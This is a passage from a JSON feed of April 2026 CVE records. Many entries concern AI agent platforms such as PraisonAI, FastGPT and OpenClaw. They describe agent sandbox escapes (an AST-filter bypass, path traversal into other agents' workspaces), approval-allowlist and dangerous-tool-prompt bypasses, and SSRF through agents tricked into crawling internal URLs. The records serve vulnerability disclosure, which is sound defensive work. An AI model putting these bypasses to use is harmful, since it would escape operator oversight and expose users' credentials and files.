fixed in 2.0-beta.2.","cvss":0.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":0.0,"cvss_v4":null,"epss":0.0003,"ranking_epss":0.08323,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/chamilo/chamilo-lms/commit/73ae6293adaa6098374bc22625342dbae5cbc446","https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-m82x-prv3-rwwv"],"published_time":"2026-04-10T18:16:40","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-1502","summary":"CR/LF bytes were not rejected by HTTP client proxy tunnel headers or host.","cvss":5.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":5.7,"epss":0.00042,"ranking_epss":0.12467,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/python/cpython/commit/05ed7ce7ae9e17c23a04085b2539fe6d6d3cef69","https://github.com/python/cpython/issues/146211","https://github.com/python/cpython/pull/146212","https://mail.python.org/archives/list/security-announce@python.org/thread/2IVPAEQWUJBCTQZEJEVTYCIKSMQPGRZ3/","http://www.openwall.com/lists/oss-security/2026/04/11/4"],"published_time":"2026-04-10T18:16:40","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40200","summary":"An issue was discovered in musl libc 0.7.10 through 1.2.6. Stack-based memory corruption can occur during qsort of very large arrays, due to incorrectly implemented double-word primitives. The number of elements must exceed about seven million, i.e., the 32nd Leonardo number on 32-bit platforms (or the 64th Leonardo number on 64-bit platforms, which is not practical).","cvss":8.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":null,"epss":0.00014,"ranking_epss":0.02481,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://musl.libc.org/releases.html","https://www.openwall.com/lists/oss-security/2026/04/10/13","http://www.openwall.com/lists/oss-security/2026/04/10/13"],"published_time":"2026-04-10T17:17:14","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40103","summary":"Vikunja is an open-source self-hosted task management platform. Prior to 2.3.0, Vikunja's scoped API token enforcement for custom project background routes is method-confused. A token with only projects.background can successfully delete a project background, while a token with only projects.background_delete is rejected. This is a scoped-token authorization bypass. This vulnerability is fixed in 2.3.0.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00026,"ranking_epss":0.07341,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/go-vikunja/vikunja/commit/6a0f39b252a81fa4b19dc56dc889183acc9225ae","https://github.com/go-vikunja/vikunja/pull/2584","https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0","https://github.com/go-vikunja/vikunja/security/advisories/GHSA-v479-vf79-mg83"],"published_time":"2026-04-10T17:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40156","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI automatically loads a file named tools.py from the current working directory to discover and register custom agent tools. This loading process uses importlib.util.spec_from_file_location and immediately executes module-level code via spec.loader.exec_module() without explicit user consent, validation, or sandboxing. The tools.py file is loaded implicitly, even when it is not referenced in configuration files or explicitly requested by the user. As a result, merely placing a file named tools.py in the working directory is sufficient to trigger code execution. This behavior violates the expected security boundary between user-controlled project files (e.g., YAML configurations) and executable code, as untrusted content in the working directory is treated as trusted and executed automatically. If an attacker can place a malicious tools.py file into a directory where a user or automated system (e.g., CI/CD pipeline) runs praisonai, arbitrary code execution occurs immediately upon startup, before any agent logic begins.  This vulnerability is fixed in 4.5.128.","cvss":7.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.8,"cvss_v4":null,"epss":0.00023,"ranking_epss":0.06212,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2g3w-cpc4-chr4","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-2g3w-cpc4-chr4"],"published_time":"2026-04-10T17:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40157","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, cmd_unpack in the recipe CLI extracts .praison tar archives using raw tar.extract() without validating archive member paths. A .praison bundle containing ../../ entries will write files outside the intended output directory. An attacker who distributes a malicious bundle can overwrite arbitrary files on the victim's filesystem when they run praisonai recipe unpack. This vulnerability is fixed in 4.5.128.","cvss":9.4,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":9.4,"epss":0.00072,"ranking_epss":0.21931,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-99g3-w8gr-x37c","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-99g3-w8gr-x37c"],"published_time":"2026-04-10T17:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40158","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI's AST-based Python sandbox can be bypassed using type.__getattribute__ trampoline, allowing arbitrary code execution when running untrusted agent code. The _execute_code_direct function in praisonaiagents/tools/python_tools.py uses AST filtering to block dangerous Python attributes like __subclasses__, __globals__, and __bases__. However, the filter only checks ast.Attribute nodes, allowing a bypass. The sandbox relies on AST-based filtering of attribute access but fails to account for dynamic attribute resolution via built-in methods such as type.getattribute, resulting in incomplete enforcement of security restrictions. The string '__subclasses__' is an ast.Constant, not an ast.Attribute, so it is never checked against the blocked list. This vulnerability is fixed in 4.5.128.","cvss":8.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":8.6,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.08603,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-3c4r-6p77-xwr7"],"published_time":"2026-04-10T17:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40159","summary":"PraisonAI is a multi-agent teams system. Prior to 4.5.128, PraisonAI’s MCP (Model Context Protocol) integration allows spawning background servers via stdio using user-supplied command strings (e.g., MCP(\"npx -y @smithery/cli ...\")). These commands are executed through Python’s subprocess module. By default, the implementation forwards the entire parent process environment to the spawned subprocess. As a result, any MCP command executed in this manner inherits all environment variables from the host process, including sensitive data such as API keys, authentication tokens, and database credentials. This behavior introduces a security risk when untrusted or third-party commands are used. In common scenarios where MCP tools are invoked via package runners such as npx -y, arbitrary code from external or potentially compromised packages may execute with access to these inherited environment variables. This creates a risk of unintended credential exposure and enables potential supply chain attacks through silent exfiltration of secrets. This vulnerability is fixed in 4.5.128.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":0.00016,"ranking_epss":0.03363,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-pj2r-f9mw-vrcq"],"published_time":"2026-04-10T17:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40160","summary":"PraisonAIAgents is a multi-agent teams system. Prior to 1.5.128, web_crawl's httpx fallback path passes user-supplied URLs directly to httpx.AsyncClient.get() with follow_redirects=True and no host validation. An LLM agent tricked into crawling an internal URL can reach cloud metadata endpoints (169.254.169.254), internal services, and localhost. The response content is returned to the agent and may appear in output visible to the attacker. This fallback is the default crawl path on a fresh PraisonAI installation (no Tavily key, no Crawl4AI installed). This vulnerability is fixed in 1.5.128.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.1,"epss":0.00041,"ranking_epss":0.12288,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-qq9r-63f6-v542","https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-qq9r-63f6-v542"],"published_time":"2026-04-10T17:17:13","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40073","summary":"SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.57.1, under certain circumstances, requests could bypass the BODY_SIZE_LIMIT on SvelteKit applications running with adapter-node. This bypass does not affect body size limits at other layers of the application stack, so limits enforced in the WAF, gateway, or at the platform level are unaffected. This vulnerability is fixed in 2.57.1.","cvss":8.2,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.2,"epss":0.0004,"ranking_epss":0.11969,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/sveltejs/kit/commit/3202ed6c98f9e8d86bf0c4c7ad0f2e273e5e3b95","https://github.com/sveltejs/kit/releases/tag/@sveltejs/kit@2.57.1","https://github.com/sveltejs/kit/security/advisories/GHSA-2crg-3p73-43xp"],"published_time":"2026-04-10T17:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40074","summary":"SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.57.1, redirect, when called from inside the handle server hook with a location parameter containing characters that are invalid in a HTTP header, will cause an unhandled TypeError. This could result in DoS on some platforms, especially if the location passed to redirect contains unsanitized user input. This vulnerability is fixed in 2.57.1.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.3,"epss":0.0004,"ranking_epss":0.11969,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/sveltejs/kit/commit/10d7b44425c3d9da642eecce373d0c6ef83b4fcd","https://github.com/sveltejs/kit/releases/tag/@sveltejs/kit@2.57.1","https://github.com/sveltejs/kit/security/advisories/GHSA-3f6h-2hrp-w5wx"],"published_time":"2026-04-10T17:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40086","summary":"Rembg is a tool to remove images background. Prior to 2.0.75, a path traversal vulnerability in the rembg HTTP server allows unauthenticated remote attackers to read arbitrary files from the server's filesystem. By sending a crafted request with a malicious model_path parameter, an attacker can force the server to attempt loading any file as an ONNX model, revealing file existence, permissions, and potentially file contents through error messages. This vulnerability is fixed in 2.0.75.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00049,"ranking_epss":0.14902,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/danielgatis/rembg/commit/7c76d3cdc5757ffbda6a76664b24cfbecdb80273","https://github.com/danielgatis/rembg/releases/tag/v2.0.75","https://github.com/danielgatis/rembg/security/advisories/GHSA-3wqj-33cg-xc48"],"published_time":"2026-04-10T17:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40097","summary":"Step CA is an online certificate authority for secure, automated certificate management for DevOps. From 0.24.0 to before 0.30.0-rc3, an attacker can trigger an index out-of-bounds panic in Step CA by sending a crafted attestation key (AK) certificate with an empty Extended Key Usage (EKU) extension during TPM device attestation. When processing a device-attest-01 ACME challenge using TPM attestation, Step CA validates that the AK certificate contains the tcg-kp-AIKCertificate Extended Key Usage OID. During this validation, the EKU extension value is decoded from its ASN.1 representation and the first element is checked. A crafted certificate could include an EKU extension that decodes to an empty sequence, causing the code to panic when accessing the first element of the empty slice. This vulnerability is only reachable when a device-attest-01 ACME challenge with TPM attestation is configured. Deployments not using TPM device attestation are not affected. This vulnerability is fixed in 0.30.0-rc3.","cvss":3.7,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":3.7,"cvss_v4":null,"epss":0.0003,"ranking_epss":0.08509,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/smallstep/certificates/commit/ffd31ac0a87e03b0224cb8363094bfe602242888","https://github.com/smallstep/certificates/pull/2569","https://github.com/smallstep/certificates/releases/tag/v0.30.0","https://github.com/smallstep/certificates/security/advisories/GHSA-9qq8-cgcv-qmc9"],"published_time":"2026-04-10T17:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40100","summary":"FastGPT is an AI Agent building platform. Prior to 4.14.10.3, the /api/core/app/mcpTools/runTool endpoint accepts arbitrary URLs without authentication. The internal IP check in isInternalAddress() only blocks private IPs when CHECK_INTERNAL_IP=true, which is not the default. This allows unauthenticated attackers to perform SSRF against internal network resources. This vulnerability is fixed in 4.14.10.3.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00046,"ranking_epss":0.14176,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/labring/FastGPT/security/advisories/GHSA-jrhc-f3j7-f8g4"],"published_time":"2026-04-10T17:17:12","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35668","summary":"OpenClaw before 2026.3.24 contains a path traversal vulnerability in sandbox enforcement allowing sandboxed agents to read arbitrary files from other agents' workspaces via unnormalized mediaUrl or fileUrl parameter keys. Attackers can exploit incomplete parameter validation in normalizeSandboxMediaParams and missing mediaLocalRoots context to access sensitive files including API keys and configuration data outside designated sandbox roots.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":7.7,"cvss_v4":7.1,"epss":0.00041,"ranking_epss":0.12387,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/security/advisories/GHSA-hr5v-j9h9-xjhg","https://www.vulncheck.com/advisories/openclaw-sandbox-media-root-bypass-via-unnormalized-mediaurl-and-fileurl-parameters"],"published_time":"2026-04-10T17:17:09","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35669","summary":"OpenClaw before 2026.3.25 contains a privilege escalation vulnerability in gateway-authenticated plugin HTTP routes that incorrectly mint operator.admin runtime scope regardless of caller-granted scopes. Attackers can exploit this scope boundary bypass to gain elevated privileges and perform unauthorized administrative actions.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":8.7,"epss":0.00039,"ranking_epss":0.11579,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/ec2dbcff9afd8a52e00de054b506c91726d9fbbe","https://github.com/openclaw/openclaw/security/advisories/GHSA-qm2m-28pf-hgjw","https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-gateway-plugin-http-authentication-scope"],"published_time":"2026-04-10T17:17:09","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35670","summary":"OpenClaw before 2026.3.22 contains a webhook reply delivery vulnerability that allows attackers to rebind chat replies to unintended users by exploiting mutable username matching instead of stable numeric user identifiers. Attackers can manipulate username changes to redirect webhook-triggered replies to different users, bypassing the intended recipient binding recorded in webhook events.","cvss":6.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.9,"cvss_v4":6.0,"epss":0.00075,"ranking_epss":0.2249,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/7ade3553b74ee3f461c4acd216653d5ba411f455","https://github.com/openclaw/openclaw/security/advisories/GHSA-wv46-v6xc-2qhf","https://www.vulncheck.com/advisories/openclaw-webhook-reply-rebinding-via-username-resolution-in-synology-chat"],"published_time":"2026-04-10T17:17:09","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35663","summary":"OpenClaw before 2026.3.25 contains a privilege escalation vulnerability allowing non-admin operators to self-request broader scopes during backend reconnect. Attackers can bypass pairing requirements to reconnect as operator.admin, gaining unauthorized administrative privileges.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":8.7,"epss":0.00039,"ranking_epss":0.11579,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/d3d8e316bd819d3c7e34253aeb7eccb2510f5f48","https://github.com/openclaw/openclaw/security/advisories/GHSA-9hjh-fr4f-gxc4","https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-backend-reconnect-scope-self-claim"],"published_time":"2026-04-10T17:17:08","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35664","summary":"OpenClaw before 2026.3.25 contains an authentication bypass vulnerability in raw card send surface that allows unpaired recipients to mint legacy callback payloads. Attackers can send raw card commands to bypass DM pairing restrictions and reach callback handling without proper authorization.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":6.9,"epss":0.00057,"ranking_epss":0.1787,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/81c45976db532324b5a0918a70decc19520dc354","https://github.com/openclaw/openclaw/security/advisories/GHSA-77w2-crqv-cmv3","https://www.vulncheck.com/advisories/openclaw-dm-pairing-bypass-via-legacy-card-callbacks"],"published_time":"2026-04-10T17:17:08","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35665","summary":"OpenClaw before 2026.3.24 contains an incomplete fix for CVE-2026-32011 where the Feishu webhook handler accepts request bodies with permissive limits of 1MB and 30-second timeout before signature verification. An unauthenticated attacker can exhaust server connection resources by sending concurrent slow HTTP POST requests to the Feishu webhook endpoint, blocking legitimate webhook deliveries.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":6.9,"epss":0.00058,"ranking_epss":0.18045,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/security/advisories/GHSA-w6m8-cqvj-pg5v","https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-feishu-webhook-pre-auth-body-parsing"],"published_time":"2026-04-10T17:17:08","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35666","summary":"OpenClaw before 2026.3.22 contains an allowlist bypass vulnerability in system.run approvals that fails to unwrap /usr/bin/time wrappers. Attackers can bypass executable binding restrictions by using an unregistered time wrapper to reuse approval state for inner commands.","cvss":7.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.8,"cvss_v4":7.7,"epss":0.00046,"ranking_epss":0.13914,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/39409b6a6dd4239deea682e626bac9ba547bfb14","https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/security/advisories/GHSA-qm9x-v7cx-7rq4","https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-unregistered-time-dispatch-wrapper"],"published_time":"2026-04-10T17:17:08","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35667","summary":"OpenClaw before 2026.3.24 contains an incomplete fix for CVE-2026-27486 where the !stop chat command uses an unpatched killProcessTree function from shell-utils.ts that sends SIGKILL immediately without graceful SIGTERM shutdown. Attackers can trigger process termination via the !stop command, causing data corruption, resource leaks, and skipped security-sensitive cleanup operations.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":6.9,"epss":0.00013,"ranking_epss":0.02048,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/security/advisories/GHSA-3298-56p6-rpw2","https://www.vulncheck.com/advisories/openclaw-improper-process-termination-via-unpatched-killprocesstree-in-shell-utils-ts"],"published_time":"2026-04-10T17:17:08","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-35658","summary":"OpenClaw before 2026.3.2 contains a filesystem boundary bypass vulnerability in the image tool that fails to honor tools.fs.workspaceOnly restrictions. Attackers can traverse sandbox bridge mounts outside the workspace to read files that other filesystem tools would reject.","cvss":6.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":6.0,"epss":0.00033,"ranking_epss":0.09524,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/14baadda2c456f3cf749f1f97e8678746a34a7f4","https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/ccfeecb6887cd97937e33a71877ad512741e82b2","https://github.com/openclaw/openclaw/commit/dd9d9c1c609dcb4579f9e57bd7b5c879d0146b53","https://github.com/openclaw/openclaw/security/advisories/GHSA-cfp9-w5v9-3q4h","https://www.vulncheck.com/advisories/openclaw-filesystem-boundary-bypass-in-image-tool"],"published_time":"2026-04-10T17:17:07","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35659","summary":"OpenClaw before 2026.3.22 contains a service discovery vulnerability where TXT metadata from Bonjour and DNS-SD could influence CLI routing even when actual service resolution failed. Attackers can exploit unresolved hints to steer routing decisions to unintended targets by providing malicious discovery metadata.","cvss":5.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.6,"cvss_v4":5.1,"epss":6e-05,"ranking_epss":0.00406,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/deecf68b59a9b7eea978e40fd3c2fe543087b569","https://github.com/openclaw/openclaw/security/advisories/GHSA-rvqr-hrcc-j9vv","https://www.vulncheck.com/advisories/openclaw-unresolved-service-metadata-routing-via-bonjour-and-dns-sd-discovery"],"published_time":"2026-04-10T17:17:07","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35660","summary":"OpenClaw before 2026.3.23 contains an insufficient access control vulnerability in the Gateway agent /reset endpoint that allows callers with operator.write permission to reset admin sessions. Attackers with operator.write privileges can invoke /reset or /new messages with an explicit sessionKey to bypass operator.admin requirements and reset arbitrary sessions.","cvss":7.2,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":7.2,"epss":0.0004,"ranking_epss":0.12059,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/50f6a2f136fed85b58548a38f7a3dbb98d2cd1a0","https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/security/advisories/GHSA-wq58-2pvg-5h4f","https://www.vulncheck.com/advisories/openclaw-insufficient-access-control-in-gateway-agent-session-reset"],"published_time":"2026-04-10T17:17:07","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35661","summary":"OpenClaw before 2026.3.25 contains an authorization bypass vulnerability in Telegram callback query handling that allows attackers to mutate session state without satisfying normal DM pairing requirements. Remote attackers can exploit weaker callback-only authorization in direct messages to bypass DM pairing and modify session state.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":6.9,"epss":0.00038,"ranking_epss":0.11396,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/269282ac69ab6030d5f30d04822668f607f13065","https://github.com/openclaw/openclaw/security/advisories/GHSA-j4c9-w69r-cw33","https://www.vulncheck.com/advisories/openclaw-telegram-dm-scoped-inline-button-callback-authorization-bypass"],"published_time":"2026-04-10T17:17:07","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35662","summary":"OpenClaw before 2026.3.22 fails to enforce controlScope restrictions on the send action, allowing leaf subagents to message controlled child sessions beyond their authorized scope. Attackers can exploit this by using the send action to communicate with child sessions without proper scope validation, bypassing intended access control restrictions.","cvss":5.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07804,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/7679eb375294941b02214c234aff3948796969d0","https://github.com/openclaw/openclaw/security/advisories/GHSA-x2cm-hg9c-mf5w","https://www.vulncheck.com/advisories/openclaw-missing-controlscope-enforcement-in-send-action"],"published_time":"2026-04-10T17:17:07","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35653","summary":"OpenClaw before 2026.3.24 contains an incorrect authorization vulnerability in the POST /reset-profile endpoint that allows authenticated callers with operator.write access to browser.request to bypass profile mutation restrictions. Attackers can invoke POST /reset-profile through the browser.request surface to stop the running browser, close Playwright connections, and move profile directories to Trash, crossing intended privilege boundaries.","cvss":7.2,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":8.1,"cvss_v4":7.2,"epss":0.0005,"ranking_epss":0.15322,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/4dcc39c25c6cc63fedfd004f52d173716576fcf0","https://github.com/openclaw/openclaw/commit/e7d11f6c33e223a0dd8a21cfe01076bd76cef87a","https://github.com/openclaw/openclaw/security/advisories/GHSA-xp9r-prpg-373r","https://www.vulncheck.com/advisories/openclaw-incorrect-authorization-in-post-reset-profile-via-browser-request"],"published_time":"2026-04-10T17:17:06","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35654","summary":"OpenClaw before 2026.3.25 contains an authorization bypass vulnerability in Microsoft Teams feedback invokes that allows unauthorized senders to record session feedback. Attackers can bypass sender allowlist checks via feedback invoke endpoints to trigger unauthorized feedback recording or reflection.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":6.9,"epss":0.00028,"ranking_epss":0.07805,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/c5415a474bb085404c20f8b312e436997977b1ea","https://github.com/openclaw/openclaw/security/advisories/GHSA-rf6h-5gpw-qrgq","https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-microsoft-teams-feedback-invoke"],"published_time":"2026-04-10T17:17:06","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35655","summary":"OpenClaw before 2026.3.22 contains an identity spoofing vulnerability in ACP permission resolution that trusts conflicting tool identity hints from rawInput and metadata. Attackers can spoof tool identities through rawInput parameters to suppress dangerous-tool prompting and bypass security restrictions.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.7,"cvss_v4":6.9,"epss":0.00039,"ranking_epss":0.117,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/e4c61723cd2d530680cc61789311d464ab8cdf60","https://github.com/openclaw/openclaw/security/advisories/GHSA-74wf-h43j-vvmj","https://www.vulncheck.com/advisories/openclaw-identity-spoofing-via-rawinput-tool-in-acp-permission-resolution"],"published_time":"2026-04-10T17:17:06","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35656","summary":"OpenClaw before 2026.3.22 contains an authentication bypass vulnerability in the X-Forwarded-For header processing when trustedProxies is configured, allowing attackers to spoof loopback hops. Remote attackers can inject forged forwarding headers to bypass canvas authentication and rate-limiting protections by masquerading as loopback clients.","cvss":6.3,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":6.3,"epss":0.00131,"ranking_epss":0.32548,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4","https://github.com/openclaw/openclaw/security/advisories/GHSA-844j-xrrq-wgh4","https://www.vulncheck.com/advisories/openclaw-xff-loopback-spoofing-bypass-in-canvas-authentication-and-rate-limiter"],"published_time":"2026-04-10T17:17:06","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35657","summary":"OpenClaw before 2026.3.25 contains an authorization bypass vulnerability in the HTTP /sessions/:sessionKey/history route that skips operator.read scope validation. Attackers can access session history without proper operator read permissions by sending HTTP requests to the vulnerable endpoint.","cvss":7.1,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":7.1,"epss":0.00023,"ranking_epss":0.06137,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/1c45123231516fa50f8cf8522ba5ff2fb2ca7aea","https://github.com/openclaw/openclaw/security/advisories/GHSA-5jvj-hxmh-6h6j","https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-http-session-history-route"],"published_time":"2026-04-10T17:17:06","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35647","summary":"OpenClaw before 2026.3.25 contains an access control vulnerability where verification notices bypass DM policy checks and reply to unpaired peers. Attackers can send verification notices to users outside allowed direct message policies by exploiting insufficient access validation before message transmission.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":6.9,"epss":0.00028,"ranking_epss":0.07805,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/openclaw/openclaw/commit/2383daf5c4a4e08d9553e0e949552ad755ef9ec2","https://github.com/openclaw/openclaw/security/advisories/GHSA-9wqx-g2cw-vc7r","https://www.vulncheck.com/advisories/openclaw-direct-message-policy-bypass-via-verification-notices"],"published_time":"2026-04-10T17:17:05","vendor":"openclaw","product":"openclaw","version":null},{"cve_id":"CVE-2026-35648","summary":"OpenClaw before 2026.3.22 contains a policy bypass vulnerability where queued node actions are not revalidated against current command policy when delivered. Attackers can exploit stale allowlists or declarations that survive policy tightening to execute unauthorized 